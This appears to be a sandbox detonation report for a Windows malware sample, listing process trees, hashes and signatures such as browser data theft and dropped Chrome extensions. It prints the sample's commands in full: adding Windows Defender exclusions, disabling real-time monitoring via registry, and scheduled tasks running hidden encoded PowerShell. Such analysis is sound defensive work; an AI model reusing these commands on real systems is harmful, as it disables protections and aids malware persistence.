PID 1544 wrote to memory of 2872 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 2872 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 2872 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2796 wrote to memory of 2256 | N/A | C:\Windows\system32\taskeng.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2796 wrote to memory of 2256 | N/A | C:\Windows\system32\taskeng.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2796 wrote to memory of 2256 | N/A | C:\Windows\system32\taskeng.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2256 wrote to memory of 1724 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\gpupdate.exe
PID 2256 wrote to memory of 1724 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\gpupdate.exe
PID 2256 wrote to memory of 1724 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\gpupdate.exe
PID 1544 wrote to memory of 1720 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1720 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1720 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1720 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe

"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe

.\Install.exe /riRVBdidLX "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bjzvzwrptCEFdBfgJx" /SC once /ST 23:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe\" Fi /nTsite_idiTD 385118 /S" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\system32\taskeng.exe

taskeng.exe {6E385E4A-D8D7-4369-91D4-303231E68A34} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe Fi /nTsite_idiTD 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "guivFWLjr" /SC once /ST 02:18:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "guivFWLjr"

C:\Windows\system32\taskeng.exe

taskeng.exe {DB64E25A-720D-4AE0-9237-1EC01284555D} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "guivFWLjr"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gqVzEotUY" /SC once /ST 05:55:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gqVzEotUY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gqVzEotUY"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\HbtuuClNkkkdGbCN\ShwGpVFp\TDpbxBctojdmUTHz.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\HbtuuClNkkkdGbCN\ShwGpVFp\TDpbxBctojdmUTHz.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ghvOphcQH" /SC once /ST 10:40:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ghvOphcQH"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "bjzvzwrptCEFdBfgJx"

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe Fi /nTsite_idiTD 385118 /S

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe

MD5 0a35bbd6448122353a2d8ea91cff5781
SHA1 742ec335853eba4e5b41200fa46958328e90cb2f
SHA256 ccc5f37eb38a137f33f8f0d603f88f178056a9c576c316f6a366727e07c9a0bb
SHA512 5c4dbc03b3c43ddea27bb6df56e5e317c64237018e325a84b257847e4223f0c3302f10b9ab5956ef7e197c237f7d346fbddbb7ee06856b42314cc0b85f300b8f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SBPNCSW8ZEUXHX7HD8U6.temp

MD5 f7b92e0e114a027ae162589e196f8844
SHA1 7fadcb83884257a2026239cd17141a811eb50aed
SHA256 818e9d082dc23539aa3e4013f093907e01d87d04227269e318901a9a0a9088d0
SHA512 dee9843c71948618156772e54b8f146991e6431ed6becb7c61e0295e01daacec7dbcaa60177d651748b72fc589285aeb405598fe094c66e3b2605b1ab1ce8000

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\Temp\HbtuuClNkkkdGbCN\ShwGpVFp\TDpbxBctojdmUTHz.wsf

MD5 44f92e47f7bbac6796287e09f4a58d27
SHA1 036350d24e0b64a0977c22d3367f79c18d86eeed
SHA256 d43581eea4cac88f4cfc4e5a1634f96984e5cb9e43c7e9fbc56a96b5caa3eb84
SHA512 558b66bbcaaa71e444654bd5d26c51854d5b4c3d6ee937b64db9b72d80754e2d75194f67ffd213a28be5602a816f2fb4ae620547e8af7b0601e36e83659e2ebf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8b144f11a703b9e766160e3bafbbc607
SHA1 dc876639ea0ef392d2fab5eb37b479b3fdaee69b
SHA256 6d3fd8c7abc601a51dd7388bc9ce08a537ee1a3ded2cb7bf2e8629411243c257
SHA512 5eb369ab05061f60a451761682a9019b1c2679d301644eca117a0c7a6ed8a6885ebb5c56b9eb58a478b076b1c0da8b48ff891a31f6f3d4102d7e19b5a8f2e31e

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-07 23:43

Reported

2024-04-07 23:46

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
